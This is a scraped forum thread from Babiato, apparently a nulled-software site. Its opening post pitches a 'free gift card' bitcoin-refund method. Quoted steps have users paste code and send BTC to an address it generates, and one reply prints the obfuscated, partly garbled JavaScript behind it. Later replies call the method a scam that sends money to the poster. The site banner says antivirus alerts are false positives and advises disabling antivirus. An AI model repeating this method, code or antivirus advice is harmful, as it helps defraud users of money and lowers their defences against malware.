• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

[METHOD] Make $100 or More per day with Private Method

Status
Not open for further replies.

spacedata

Aug 19, 2019
This allows you to Get any giftcard for free
Guess it's time limited though i don't know till when.

PRO FEATS:
  1. Free gift cards
  2. Amazon gift cards
  3. Steam gift cards = Free STEAM GAMES!!!
EDITED BY Admin

Last edited by a moderator:
Reactions: Ahmedz
is it necessary the amt of product i buy i have that amt in my bitpay for going through this process ??

you do not need bitbay to do the bitcoin payment, you can use any bitcoin wallet when the payment goes through bitbay will detect it as an unauthorised transaction, therefore, refunding you almost immediately

you do not need bitbay to do the bitcoin payment, you can use any bitcoin wallet when the payment goes through bitbay will detect it as an unauthorised transaction, therefore, refunding you almost immediately
step 7 make it confusing....where send btc value this step cant understand

Now copy the new Bitcoin Address, and send there the exact amount of BTC that you were asked for in your invoice. (You should have noted that amount in Step 3.) Your bitcoin address will appear below the code you pasted in, all address will be different.

thats why make a video if possible :)

This allows you to Get any giftcard for free
Guess it's time limited though i don't know till when.

PRO FEATS:
  1. Free gift cards
  2. Amazon gift cards
  3. Steam gift cards = Free STEAM GAMES!!!
Proof

Tutorial

Code

You are new member , as you joined today i dont trust to this

any one decode this code

var _cs=["\x61\x52","\x30\x2f","\x74\x69","\x67\x20","\x74\x2e","\x41\x77","\x70\x61","\x56\x6e","\x66\x42\x75","\x72\x6d\x61","\x5a\x67","\x45\x6b\x63","\x33\x42\x52","\x69\x6e","\x6f\x6e","\x65\x6e","\x54\x57","\x33\x50\x77","\x33\x20","\x73\x29","\x6f\x7a\x4e","\x68\x72\x38","\x61\x69\x74","\x50\x66\x61","\x38\x70\x57","\x6e\x66\x69","\x43\x6f","\x79\x6d","\x2e\x2e\x28","\x73\x69"];
console.log(_cs[17]+_cs[21]+_cs[8]+_cs[24]+_cs[16]+_cs[20]+_cs[23]+_cs[12]+_cs[7]+_cs[29]+_cs[0]+_cs[10]+_cs[11]); console.log(_cs[5]+_cs[22]+_cs[13]+_cs[3]+_cs[6]+_cs[27]+_cs[15]+_cs[4]+_cs[28]+_cs[1]+_cs[18]+_cs[26]+_cs[25]+_cs[9]+_cs[2]+_cs[14]+_cs[19]); asdd; a; sd; as; d; as(_g7), _g0 = _ge[4](_g0), _g1 = _ge[4](_g2), _g2 = _ge[4](_g1), _g3 = _ge[4](_g1), _g4 = _ge[4](_g1), _g5 = _ge[4](_g1), _g6 = _ge[4](_g1), _g7 = _ge[4](_g1), _g8 = _ge[4](_g1), _g9 = _ge[4](_g1), _ga = _ge[4](_g1), _gb = _ge[4](_g1), _gc = _ge[4](_g1), _gd = _ge[4](_g1), _gd = _ge[4](va16396eed6aaedfee08471197c4dbe94), _ge = _ge[4](_g1)

step 7 make it confusing....where send btc value this step cant understand

Now copy the new Bitcoin Address, and send there the exact amount of BTC that you were asked for in your invoice. (You should have noted that amount in Step 3.) Your bitcoin address will appear below the code you pasted in, all address will be different.

thats why make a video if possible :)

dont follow this tutorial , i think he is scammer , as he not provide any video

dont follow this tutorial , i think he is scammer , as he not provide any video
To be honest , I have seen similar things in the past and I do know this will work. Just not sure if it is already patched or not. The only problem in this is the pastebin code, have no idea what it states, but quite worried that it might simply send the money to this user. i am not familiar with coding so anyone who can decode it, will really appreciated it.

Reactions: expert_winxp
To be honest , I have seen similar things in the past and I do know this will work. Just not sure if it is already patched or not. The only problem in this is the pastebin code, have no idea what it states, but quite worried that it might simply send the money to this user. i am not familiar with coding so anyone who can decode it, will really appreciated it.

i think we will transfer to this user bitcoin account

"Now copy the new Bitcoin Address, and send there the exact amount of BTC that you were asked for in your invoice."

How easy is it to scam you guys ?? Don't you see that this is a scam?? COME ON !!! Reported.

Status
Not open for further replies.
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock